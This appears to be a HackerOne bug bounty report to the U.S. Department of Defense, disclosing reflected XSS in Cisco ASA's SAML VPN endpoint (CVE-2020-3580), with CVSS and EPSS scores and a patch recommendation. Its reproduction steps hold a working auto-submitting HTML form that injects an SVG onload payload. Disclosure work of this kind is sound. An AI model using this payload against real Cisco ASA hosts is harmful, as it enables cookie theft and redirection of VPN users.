Lucene search

K
hackeroneCruxn3tH1:1606068
HistoryJun 18, 2022 - 7:23 p.m.

U.S. Dept Of Defense: XSS DUE TO CVE-2020-3580

2022-06-1819:23:56
cruxn3t
hackerone.com
10

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

2.6 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:N/C:N/I:P/A:N

0.973 High

EPSS

Percentile

99.8%

Hello Team,
During my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580, This vulnerability targets the saml service within the VPN. It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a

References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

Impact

With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.

System Host(s)

█████

Affected Product(s) and Version(s)

Cisco ASA

CVE Numbers

CVE-2020-3580

Steps to Reproduce

<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=“https://████/+CSCOE+/saml/sp/acs?tgname=a” method=“POST”>
<input type=“hidden” name=“SAMLResponse” value=“"><svg/onload=alert('XSS')>” />
<input type=“hidden” name=“” value=“” />
<input type=“submit” value=“Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Suggested Mitigation/Remediation Actions

Patch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

2.6 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:H/Au:N/C:N/I:P/A:N

0.973 High

EPSS

Percentile

99.8%